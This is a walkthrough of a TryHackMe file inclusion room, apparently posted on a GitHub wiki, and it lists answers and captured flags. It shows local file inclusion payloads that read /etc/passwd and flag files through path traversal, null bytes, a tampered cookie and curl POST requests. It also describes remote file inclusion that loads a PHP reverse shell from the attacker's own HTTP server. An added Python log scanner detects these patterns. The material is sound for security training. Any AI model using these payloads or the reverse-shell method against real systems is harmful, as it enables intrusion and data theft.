THM File Inclusion - grunt92/IT-Sec-WriteUps GitHub Wiki

Introduction

Let's continue to the next section to deploy the attached VM.

No answer needed

Deploy the VM

Once you've deployed the VM, please wait a few minutes for the webserver to start, then progress to the next section!

No answer needed

Path Traversal

What function causes path traversal vulnerabilities in PHP?

File_Get_Contents

Local File Inclusion - LFI

Give Lab #1 a try to read /etc/passwd. What would the request URI be?

lab1.php?file=/etc/passwd

In Lab #2, what is the directory specified in the include function?

includes

Local File Inclusion - LFI #2

Give Lab #3 a try to read /etc/passwd. What does the request look like?

/lab3.php?file=../../../../etc/passwd%00

Which function is causing the directory traversal in Lab #4?

file_get_contents

Try out Lab #6 and check which directory has to be in the input field.

THM-profile

Try out Lab #6 and read /etc/os-release. What is the VERSION_ID value?

In Lab #6, enter "THM-profile/../../../../etc/os-release" to get the answer.

12.04

Remote File Inclusion - RFI

We showed how to include PHP pages via RFI. Do research on how to get remote command execution (RCE), and answer the question in the challenge section.

Remediation

Ready for the challenges?

No answer needed
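The labs above rely on three request patterns a defender can look for in web-server logs: directory traversal (../) in a file parameter, a trailing null byte (%00) used to cut off an appended extension, and a remote URL handed to an include. The Python script below is an added example, not part of the original writeup or the room; it scans constructed access-log lines for those indicators after URL-decoding the file parameter (repeatedly, so double-encoded payloads are caught too). The parameter name "file", the log lines and the IP addresses are assumptions chosen to match the lab URLs on this page.

```python
"""Flag file-inclusion indicators in web access logs (added example, not from the original page)."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Query parameter the lab pages read a filename from (assumption based on the lab URLs above).
FILE_PARAMS = {"file"}

# Constructed sample lines in combined log format; the IPs are documentation ranges, not real hosts.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /lab1.php?file=includes/about.php HTTP/1.1" 200 512
192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET /lab1.php?file=/etc/passwd HTTP/1.1" 200 1843
192.0.2.10 - - [01/Jan/2024:10:00:02 +0000] "GET /lab3.php?file=../../../../etc/passwd%00 HTTP/1.1" 200 1843
192.0.2.10 - - [01/Jan/2024:10:00:03 +0000] "GET /lab6.php?file=THM-profile%2F..%2F..%2Fetc%2Fos-release HTTP/1.1" 200 300
192.0.2.10 - - [01/Jan/2024:10:00:04 +0000] "GET /playground.php?file=http://198.51.100.9:9999/shell.php HTTP/1.1" 200 77
192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "GET /lab3.php?file=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 404 0
"""

# Matches the request line inside a combined-log entry.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Indicator name -> predicate over the fully decoded parameter value.
INDICATORS = {
    "traversal": lambda v: "../" in v or "..\\" in v,
    "null_byte": lambda v: "\x00" in v,
    "absolute_path": lambda v: v.startswith("/"),
    "remote_include": lambda v: re.match(r"^[a-z][a-z0-9+.\-]*://", v, re.I) is not None,
}


def fully_decode(value, rounds=3):
    """URL-decode until the value stops changing, so %252e%252e%252f becomes ../ as well."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_params(target):
    """Return [(param, decoded_value, [indicators])] for file parameters in one request target."""
    query = urlsplit(target).query
    hits = []
    for name, raw in parse_qsl(query, keep_blank_values=True):
        if name not in FILE_PARAMS:
            continue
        value = fully_decode(raw)  # parse_qsl already decoded once; this handles further layers
        found = [label for label, check in INDICATORS.items() if check(value)]
        if found:
            hits.append((name, value, found))
    return hits


def scan_log(text):
    """Scan access-log text and return one finding dict per suspicious file parameter."""
    findings = []
    for line in text.splitlines():
        match = LOG_RE.search(line)
        if not match:
            continue
        target = match.group("target")
        for name, value, found in suspicious_params(target):
            findings.append({
                "path": urlsplit(target).path,
                "param": name,
                "value": value,
                "indicators": found,
            })
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f'{finding["path"]} {finding["param"]}={finding["value"]!r} -> {", ".join(finding["indicators"])}')
```

Only GET query strings are visible in a standard access log, so the POST-body payloads of chall1 and chall3 and the THM-cookie value used in chall2 would not be caught here; catching those needs application-level logging of the parameters the include actually receives, or a WAF that inspects bodies and cookies. The decode loop matters because a single decode would miss the double-encoded last line.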

Challenge

Capture Flag1 at /etc/flag1

Run curl -d "file=/etc/flag1" -X POST http://IP/challenges/chall1.php

F1x3d-iNpu7-f0rrn

Capture Flag2 at /etc/flag2

Inspect the site and you will see a cookie, THM-cookie, identifying us as user. Change its value to "../../../../etc/flag2%00" and reload the page.

c00k13_i5_yuMmy1

Capture Flag3 at /etc/flag3

Run curl -d "file=../../../etc/flag3%00" -X POST http://IP/challenges/chall3.php --output file.txt, then cat file.txt to get the flag.

P0st_1s_w0rk1in9

Gain RCE in Lab #Playground /playground.php with RFI to execute the hostname command. What is the output?

Select a php-reverse-shell of your choice and edit it to connect to your device. Place the shell in a directory and start an HTTP server there with python3 -m http.server 9999. Start a listener on your device and browse to "http://THM_IP/playground.php?file=http://LOCAL_DEVICE:PORT/php-reverse-shell.php". A shell should be established. Run hostname to get the answer.

lfi-vm-thm-f8c5b1a78692